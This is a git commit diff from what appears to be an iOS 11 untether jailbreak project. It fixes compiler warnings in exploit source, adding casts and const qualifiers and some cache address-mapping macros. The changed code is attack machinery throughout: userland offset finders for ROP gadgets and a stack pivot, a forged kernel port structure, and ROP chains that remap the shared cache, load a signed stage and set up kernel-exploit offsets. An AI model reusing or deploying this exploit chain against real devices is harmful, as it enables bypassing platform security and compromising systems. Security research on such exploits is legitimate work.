Fixed all the warnings and added cache file to virt mapping (untested)

AaronLee3364 · Sep 18, 2019 · 2899b98 · 2899b98
1 parent c38327c
commit 2899b98
Show file tree

Hide file tree

Showing 6 changed files with 93 additions and 175 deletions.
diff --git a/src/untether/common.h b/src/untether/common.h
@@ -14,6 +14,10 @@
     typedef uint32_t kptr_t;
 #endif
 
+#ifdef LOG
+#undef LOG
+#endif
+
 #ifdef RELEASE
 #   define LOG(str, args...) do { } while(0)
 #else

diff --git a/src/untether/install.m b/src/untether/install.m
@@ -29,31 +29,31 @@ int install(const char *config_path, const char *racoon_path, const char *dyld_c
 	// find the address of "No more than %d WINS" and "failed to set my ident %s" then an xref to the error handling code and then an xref which calls that code, for the first one you need to find an adr and for the second one you need an ldr
 	myoffsets.dns4_array_to_lcconf = -((isakmp_cfg_config_addr()+0x28-4*8)-lcconf_addr()); 
 	myoffsets.lcconf_counter_offset = 0x10c; // we could try and find that dynamically or we could just hardcode it cause it prob doesn't change on 11.x (TODO: get that dynamically)
-	myoffsets.memmove = memmove_cache_ptr(dyld_cache_path);  // strlcpy second branch
+	myoffsets.memmove = (uint64_t)memmove_cache_ptr(dyld_cache_path);  // strlcpy second branch
 	myoffsets.longjmp = realsym(dyld_cache_path,"__longjmp"); // dlsym
-	myoffsets.stack_pivot = get_stackpivot_addr(dyld_cache_path); // longjmp from mov x2, sp
+	myoffsets.stack_pivot = (uint64_t)get_stackpivot_addr(dyld_cache_path); // longjmp from mov x2, sp
 	myoffsets.mmap = realsym(dyld_cache_path,"__mmap"); // dlsym of __mmap
 	myoffsets.memcpy = realsym(dyld_cache_path,"_memcpy"); // dlsym
 	myoffsets.open = realsym(dyld_cache_path,"_open"); // dlsym
 	myoffsets.max_slide = get_cache_maxslide(); // just get 8 bytes at offset 30 from the cache
 	myoffsets.slide_value = 0x4000; // hardcode that one
-	myoffsets.pivot_x21 = get_pivot_x21_gadget(); // I hope this doesn't change on any version but we need to find the same gadget on all version (gadget and byte seqeunce can be found in stage1.m)
+	myoffsets.pivot_x21 = (uint64_t)get_pivot_x21_gadget(); // I hope this doesn't change on any version but we need to find the same gadget on all version (gadget and byte seqeunce can be found in stage1.m)
 	myoffsets.pivot_x21_x9_offset = 0x50-0x38; // this is not needed on 11.1.2 but because 11.3.1 and above lack the orignal x21 gadget we need to introduce that one here
 	myoffsets.str_buff_offset = 8; // based on the pivot gadget above
-	myoffsets.BEAST_GADGET = get_beast_gadget(); // we can find that because it's part of a function and shouldn't change but it's basically also just byte matching cause if it would change the load order the whole framework would stop loading
+	myoffsets.BEAST_GADGET = (uint64_t)get_beast_gadget(); // we can find that because it's part of a function and shouldn't change but it's basically also just byte matching cause if it would change the load order the whole framework would stop loading
 	myoffsets.BEAST_GADGET_LOADER = myoffsets.BEAST_GADGET+4*9; // take the address above and search for the blr x27 and add 4
 	myoffsets.BEAST_GADGET_CALL_ONLY = myoffsets.BEAST_GADGET+4*8; // take the address above and search for the blr x27
-	myoffsets.str_x0_gadget = get_str_x0_gadget(); // search for the byte sequence again (gadget in rop.h)
+	myoffsets.str_x0_gadget = (uint64_t)get_str_x0_gadget(); // search for the byte sequence again (gadget in rop.h)
 	myoffsets.str_x0_gadget_offset = 0x28; // based on the gadget above
-	myoffsets.cbz_x0_gadget = get_cbz_x0_gadget(); // search for the byte sequence (gadget in rop.h)
-	myoffsets.cbz_x0_x16_load = get_cbz_x0_x16_load(myoffsets.cbz_x0_gadget); // decode the gadget above there will be a jump, follow that jump and decode the adrp and add there
-	myoffsets.add_x0_gadget = get_add_x0_gadget(); // raw byte search again (gadget is in rop.h)
+	myoffsets.cbz_x0_gadget = (uint64_t)get_cbz_x0_gadget(); // search for the byte sequence (gadget in rop.h)
+	myoffsets.cbz_x0_x16_load = (uint64_t)get_cbz_x0_x16_load((void*)myoffsets.cbz_x0_gadget); // decode the gadget above there will be a jump, follow that jump and decode the adrp and add there
+	myoffsets.add_x0_gadget = (uint64_t)get_add_x0_gadget(); // raw byte search again (gadget is in rop.h)
 	myoffsets.fcntl_raw_syscall = realsym(dyld_cache_path,"__fcntl"); // raw bytes again (because it's a mov x16, <imm>, svc and that can't change)
 	myoffsets.raw_mach_vm_remap_call = realsym(dyld_cache_path,"_mach_vm_remao");
 	myoffsets.rop_nop = myoffsets.BEAST_GADGET+4*17; // just use the longjmp gadget above and search the ret instruction
 	myoffsets.new_cache_addr = 0x1c0000000; 
 	myoffsets.cache_text_seg_size = 0x30000000; // we can get that by parsing the segements from the cache
-	myoffsets.errno_offset = get_errno_offset(dyld_cache_path); // we can get that by getting a raw syscall (for example __mmap, then searching for a branch following that and then searching for an adrp and a str)
+	myoffsets.errno_offset = (uint64_t)get_errno_offset(dyld_cache_path); // we can get that by getting a raw syscall (for example __mmap, then searching for a branch following that and then searching for an adrp and a str)
 	myoffsets.mach_msg_offset = 0x1f1535018; // don't know what this causes we need to figure it out later
 	myoffsets.stage2_base = myoffsets.new_cache_addr+myoffsets.cache_text_seg_size+0x4000;
 	myoffsets.stage2_max_size = 0x200000;

diff --git a/src/untether/stage2.m b/src/untether/stage2.m
@@ -571,7 +571,7 @@ void stage2(jake_img_t kernel_symbols, offset_struct_t * offsets,char * base_dir
 	SET_ROP_VAR64_TO_VAR_W_OFFSET("ool_msg",offsetof(ool_message_struct,desc[0].address),"tmp_port",0);
 
 	kport_t * fakeport = malloc(sizeof(kport_t));
-	memset(fakeport,0,sizeof(kport_t));
+	memset((void*)fakeport,0,sizeof(kport_t));
 	fakeport->ip_bits = IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE;
 	fakeport->ip_references = 100;
 	fakeport->ip_lock.type = 0x11;
@@ -749,8 +749,8 @@ void stage2(jake_img_t kernel_symbols, offset_struct_t * offsets,char * base_dir
     get_property_msg->request.Head.msgh_reserved = 0;
 	get_property_msg->request.Head.msgh_id = 2812;
 	get_property_msg->request.dataCnt = 4096;
-	snprintf(&get_property_msg->request.property_name,12,"boot-args");
-	get_property_msg->request.property_nameCnt = strlen(&get_property_msg->request.property_name);
+	snprintf((char*)&get_property_msg->request.property_name,12,"boot-args");
+	get_property_msg->request.property_nameCnt = strlen((char*)&get_property_msg->request.property_name);
 
 	DEFINE_ROP_VAR("get_property_msg",sizeof(union get_property_union),get_property_msg);
 	ROP_VAR_CPY_W_OFFSET("get_property_msg",offsetof(union get_property_union,request.Head.msgh_local_port),"reply_port",0,sizeof(mach_port_t));
@@ -1194,7 +1194,7 @@ void stage2(jake_img_t kernel_symbols, offset_struct_t * offsets,char * base_dir
 	CALL("__mmap",offsets->stage3_loadaddr,offsets->stage3_size,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE,0,0,0,0);
 	fsignatures_t * siginfo = malloc(sizeof(fsignatures_t));
 	memset(siginfo,0,sizeof(fsignatures_t));
-	siginfo->fs_blob_start = offsets->stage3_loadaddr + offsets->stage3_CS_blob;
+	siginfo->fs_blob_start = (void*)(offsets->stage3_loadaddr + offsets->stage3_CS_blob);
 	siginfo->fs_blob_size = offsets->stage3_CS_blob_size;
 	DEFINE_ROP_VAR("siginfo",sizeof(fsignatures_t),siginfo);
 	ROP_VAR_ARG_HOW_MANY(2);
@@ -1308,18 +1308,18 @@ void stage2(jake_img_t kernel_symbols, offset_struct_t * offsets,char * base_dir
 	lib_offsets->struct_offsets.task_all_image_info_addr = 0x3a8;
 	lib_offsets->struct_offsets.task_all_image_info_size = 0x3b0;
 	// iosurface stuff isn't set and also isn't used
-	lib_offsets->userland_funcs.write = get_addr_from_name(offsets,"write") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.IOConnectTrap6 = get_addr_from_name(offsets,"IOConnectTrap6") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_ports_lookup = get_addr_from_name(offsets,"mach_ports_lookup") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_task_self = get_addr_from_name(offsets,"mach_task_self") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_vm_remap = offsets->raw_mach_vm_remap_call - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_port_destroy = get_addr_from_name(offsets,"mach_port_destroy") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_port_deallocate = get_addr_from_name(offsets,"mach_port_deallocate") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_port_allocate = get_addr_from_name(offsets,"mach_port_allocate") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_port_insert_right = get_addr_from_name(offsets,"mach_port_insert_right") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_ports_register = get_addr_from_name(offsets,"mach_ports_register") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.mach_msg = get_addr_from_name(offsets,"mach_msg") - 0x180000000 + offsets->new_cache_addr;
-	lib_offsets->userland_funcs.posix_spawn = get_addr_from_name(offsets,"posix_spawn") - 0x180000000 + offsets->new_cache_addr;
+	lib_offsets->userland_funcs.write = (void*)(get_addr_from_name(offsets,"write") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.IOConnectTrap6 = (void*)(get_addr_from_name(offsets,"IOConnectTrap6") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_ports_lookup = (void*)(get_addr_from_name(offsets,"mach_ports_lookup") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_task_self = (void*)(get_addr_from_name(offsets,"mach_task_self") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_vm_remap = (void*)(offsets->raw_mach_vm_remap_call - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_port_destroy = (void*)(get_addr_from_name(offsets,"mach_port_destroy") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_port_deallocate = (void*)(get_addr_from_name(offsets,"mach_port_deallocate") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_port_allocate = (void*)(get_addr_from_name(offsets,"mach_port_allocate") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_port_insert_right = (void*)(get_addr_from_name(offsets,"mach_port_insert_right") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_ports_register = (void*)(get_addr_from_name(offsets,"mach_ports_register") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.mach_msg = (void*)(get_addr_from_name(offsets,"mach_msg") - 0x180000000 + offsets->new_cache_addr);
+	lib_offsets->userland_funcs.posix_spawn = (void*)(get_addr_from_name(offsets,"posix_spawn") - 0x180000000 + offsets->new_cache_addr);
 	DEFINE_ROP_VAR("lib_offsets",sizeof(offsets_t),lib_offsets);
 	// jump void where_it_all_starts(kport_t * fakeport,void * fake_client,uint64_t ip_kobject_client_port_addr,uint64_t our_task_addr,uint64_t kslide,uint64_t the_one,offsets_t * offsets)
 	ROP_VAR_ARG_HOW_MANY(7);

diff --git a/src/untether/uland_offsetfinder.h b/src/untether/uland_offsetfinder.h
@@ -1,29 +1,30 @@
 #include "common.h"
+#include "img.h" // libjake
 #ifndef ULAND_OFFSETFINDER_H
 #define ULAND_OFFSETFINDER_H
+jake_img_t racoon_img;
+jake_img_t cache_img;
 
-void * racoon_bin;
-size_t racoon_bin_size;
-void * shared_cache;
-size_t shared_cache_size;
-
-void * find_data_raw(void * bin, size_t bin_size, void * data, size_t data_size,int search_aligned);
+void * find_data_raw(const void * bin, size_t bin_size, void * data, size_t data_size,int search_aligned);
 void * find_str(char * str);
 void * find_ref(void * addr);
 void * find_code_xref(void * addr);
 void * isakmp_cfg_config_addr();
 void * lcconf_addr();
 size_t get_cache_maxslide();
-void * memmove_cache_ptr(char * path);
-void * get_stackpivot_addr(char * path);
+void * memmove_cache_ptr(const char * path);
+void * get_stackpivot_addr(const char * path);
 void * get_cbz_x0_gadget();
 void * get_cbz_x0_x16_load(void * cbz_x0_gadget_addr);
-void * get_errno_offset(char * path);
+void * get_errno_offset(const char * path);
 void * get_pivot_x21_gadget();
 void * get_beast_gadget();
 void * get_str_x0_gadget();
 void * get_add_x0_gadget();
-void init_uland_offsetfinder(char * racoon_bin, char * cache);
+void init_uland_offsetfinder(const char * racoon_bin, const char * cache);
 #define find_data(bin,bin_size,data,data_size) find_data_raw(bin,bin_size,data,data_size,1)
 
+#define CACHE_FILE2ADDR(addr) ((void*)jake_vaddr_to_fileoff(cache_img,(uint64_t)addr)+0x180000000)
+#define CACHE_ADDR2FILE(addr) ((void*)jake_fileoff_to_vaddr(cache_img,(uint64_t)addr-0x180000000))
+
 #endif